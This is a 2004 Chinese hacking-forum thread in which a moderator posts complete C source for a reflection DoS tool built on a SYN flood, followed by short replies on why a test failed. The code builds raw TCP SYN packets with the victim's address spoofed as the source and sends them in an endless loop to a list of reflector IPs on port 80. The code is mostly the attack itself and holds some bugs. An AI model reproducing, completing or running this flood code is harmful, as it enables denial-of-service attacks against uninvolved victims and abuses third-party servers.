论坛: 编程破解 标题: DrDoS[讨论] 复制本贴地址    
作者: SysHu0teR [syshunter]    版主   登录
根据TOMYCHEN提供的synflood改的DrDoS。郁闷,测试不成功。哪位精通TCP老兄给指点指点
代码:

//FileName:DRDos.c
//Author:Unknow
//Modify:Tomy.Chen
//last modify:SysHu0teR
//LastTime:2004-11-28 12:57
//Description:
//Synflood DoS attack,and this version support and win32
//compile with linux need the "pthread" lib
//compiled on vc++ 6.0 and gcc 3.2.2
#include<stdio.h>
#ifdef WIN32
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")

#else

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <pthread.h>
#include <errno.h>


#endif

#ifndef WIN32
#define USHORT        unsigned short
#define SOCKET        int
#define DWORD        unsigned long
#define UCHAR        unsigned char
#define HANDLE        int
#define INVALID_SOCKET  (SOCKET)(~0)
#define SOCKET_ERROR            (-1)
#define GetLastError()    errno
#define WSAGetLastError()    errno
#endif

#define bool int
#define true 1
#define false 0
// #define SERVER_IP "61.129.81.210"      //这是上面我所说的所谓的大量节点        更改
#define SEQ 0x28376839
#define LOG "===============Begin====================\n"
USHORT checksum(USHORT *buffer, int size);
int flood();

typedef struct tcphdr
{
    USHORT th_sport;
    USHORT th_dport;
    unsigned int th_seq;
    unsigned int th_ack;
    unsigned char th_lenres;
    unsigned char th_flag;
    USHORT th_win;
    USHORT th_sum;
    USHORT th_urp;
}TCP_HEADER;

typedef struct iphdr
{
    unsigned char h_verlen;
    unsigned char tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char proto;
    unsigned short checksum;
    unsigned int sourceIP;
    unsigned int destIP;
}IP_HEADER;

struct
{
    unsigned long saddr;
    unsigned long daddr;
    char mbz;
    char ptcl;
    unsigned short tcpl;
}PSD_HEADER;

#ifdef WIN32
WSADATA wsaData;
#endif
SOCKET  sockMain;
int ErrorCode=0,flag=true,TimeOut=2000,ServerIpNet,ServerIpHost,dataSize=0,SendSEQ=0;        //更改
int    portNum=0;
unsigned short activPort=40000;
struct sockaddr_in sockAddr;
TCP_HEADER  tcpheader;
IP_HEADER  ipheader;
char        sendBuf[128];

USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;
    while(size >1) {
        cksum+=*buffer++;
        size-=sizeof(USHORT);
    }
    if(size) cksum+=*(UCHAR*)buffer;
    cksum=(cksum >> 16)+(cksum&0xffff);
    cksum+=(cksum >>16);
    return (USHORT)(~cksum);
}

int main(int argc,char* argv[])
{
#ifndef WIN32
    pthread_attr_t attr;
    pthread_t tid;
#endif   

    DWORD  dw;
    HANDLE hThread=0;
    char  putInfo;

    if(argc!=3)
    {
        printf("%s\n",LOG);
        printf("Invalid command,Pls use:\n%s  <IP> <port> <iplist_file>\nExample:%s 192.168.100.244 80 ip.txt\n",argv[0],argv[0]);
        return 1;
    }
#ifdef WIN32   
    if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
            printf("WSAStartup failed: %d\n",ErrorCode);
            return 2;
    }
#endif   
    sockMain=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
    if(sockMain==INVALID_SOCKET)
    {
        printf("Socket failed: %d\n",WSAGetLastError());
        return 3;
    }
    ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
    if(ErrorCode==SOCKET_ERROR)
    {
        printf("Set sockopt failed: %d\n",WSAGetLastError());
        return 4;
    }
#ifdef WIN32
    ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
    if(ErrorCode==SOCKET_ERROR)
    {
        printf("Set sockopt time out failed: %d\n",WSAGetLastError());
        return 5;
    }
#endif
    portNum=atoi(argv[2]);          //要攻击IP的哪个端口?

//    memset(&sockAddr,0,sizeof(sockAddr));
//    sockAddr.sin_family=AF_INET;
//    sockAddr.sin_addr.s_addr =inet_addr(SERVER_IP);
//    ServerIpNet=inet_addr(SERVER_IP);        //更改
//    ServerIpHost=ntohl(ServerIpNet);        //更改

    ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
    ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
    ipheader.ident = 1;
    ipheader.frag_and_flags = 0;
    ipheader.ttl = 128;
    ipheader.proto = IPPROTO_TCP;
    ipheader.checksum =0;
    ipheader.sourceIP = inet_addr(argv[1]); //这里的源地址就是要攻击的地址
    ipheader.destIP = inet_addr(argv[1]);        //根据理论,目标地址就是网络节点

    tcpheader.th_dport=htons(80);        //给网络节点的80端口发送包,
    tcpheader.th_sport = htons(portNum);
    tcpheader.th_seq = htonl(SEQ+SendSEQ);
    tcpheader.th_ack = 0;
    tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
    tcpheader.th_flag = 2;
    tcpheader.th_win = htons(65534);//16384);
    tcpheader.th_urp = 0;
    tcpheader.th_sum = 0;

//下面是伪首部
    PSD_HEADER.saddr=ipheader.sourceIP;
    PSD_HEADER.daddr=ipheader.destIP;
    PSD_HEADER.mbz=0;
    PSD_HEADER.ptcl=IPPROTO_TCP;
    PSD_HEADER.tcpl=htons(sizeof(tcpheader));
    printf("%s\n",LOG);
#ifdef WIN32
    hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
    SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
    ResumeThread(hThread);
#else
    pthread_attr_init(&attr);
    pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM);
    hThread = pthread_create(&tid,NULL,(void*)flood,NULL);
#endif

    printf("Warning[start]...........\nPress any key to stop!\n");
    putInfo=getchar();
   
   
#ifdef WIN32   
    TerminateThread(hThread,0);
    WSACleanup();
#else
    pthread_exit((void*)hThread);
#endif

    printf("\nStopd...........\n");

    return 0;
}

int flood()
{
    FILE *list;
    char serverip[20];

    while(1)
    {
        list=fopen("d:\ip.txt","r");
        while(!feof(list)) {
            fscanf(list,"%s",serverip);

                                if(SendSEQ++==65536) SendSEQ=1;
        //if(activPort++==40010) activPort=1000;
        memset(&sockAddr,0,sizeof(sockAddr));
                    sockAddr.sin_family=AF_INET;
                    sockAddr.sin_addr.s_addr =inet_addr(serverip);
                                ipheader.checksum =0;
        ipheader.destIP = inet_addr(serverip);      //变换网络节点IP
        tcpheader.th_seq = htonl(SEQ+SendSEQ);
        //tcpheader.th_sport = htons(activPort);
        tcpheader.th_sum = 0;
        PSD_HEADER.daddr=ipheader.destIP;          //同上
        memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
        memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
        tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));

        memcpy(sendBuf,&ipheader,sizeof(ipheader));
        memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
        memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
        dataSize=sizeof(ipheader)+sizeof(tcpheader);
        ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
        memcpy(sendBuf,&ipheader,sizeof(ipheader));
        ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
        Sleep(1);
        }
        fclose(list);
        if(ErrorCode==SOCKET_ERROR)
        {
            printf("\nCan't connect this IP!Pls check it.\n");
#ifdef WIN32
            ExitThread(1);
#else
            pthread_exit((void*)1);
#endif
        }
        // Sleep(1000);
    }
    return 0;
}



地主 发表时间: 04-12-19 14:41

回复: 286 [unique]   版主   登录
晕,什么现象?到哪里出问题了?


B1层 发表时间: 04-12-20 11:34

回复: TomyChen [quest]   版主   登录
自己开Sniffer抓包....还有,不一定是所有的机器都会返回SYN+ACK的

B2层 发表时间: 04-12-21 20:31

回复: SysHu0teR [syshunter]   版主   登录
TO:286
就是那个什么分布式反弹拒绝服务攻击。

当然抓包了,用本机测试可以收到SYN/ACK包(当然能受到),但是用两台机器测试,A伪装B地址发包,B就收不到包。A收到一大堆ARP的什么包,等这礼拜回家了把包信息贴上来

B3层 发表时间: 04-12-22 13:56

论坛: 编程破解

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号